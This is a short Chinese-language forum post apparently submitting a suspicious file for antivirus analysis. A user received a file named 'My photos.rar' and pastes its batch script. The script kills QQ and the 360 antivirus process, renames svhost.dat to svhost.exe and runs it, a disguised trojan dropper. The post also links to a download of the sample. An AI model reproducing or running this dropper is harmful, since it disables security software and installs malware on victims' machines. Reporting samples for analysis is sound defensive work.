今天网友给我发送了一个 我的照片.rar 的文件 经过两次解压缩 得到dp1.fne mm1.jpg 2.bat svhost.dat 四个文件 瑞星查毒没有显示
其中 2.bat 为@echo off
if "%~1"=="" start /min "" "%~0" h&exit
@taskkill /f /im qq.exe
@taskkill /f /im 360sd.exe
@taskkill /f /im svhost.exe
@del svhost.exe
@ren svhost.dat svhost.exe
@start svhost.exe
exit
找不到文件上传, 可疑文件 我的照片.rar文件放置在
http://chenzaix.9966.org/wdzp.rar希望高手分析,增加病毒特征库
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)附件:
我的照片.rar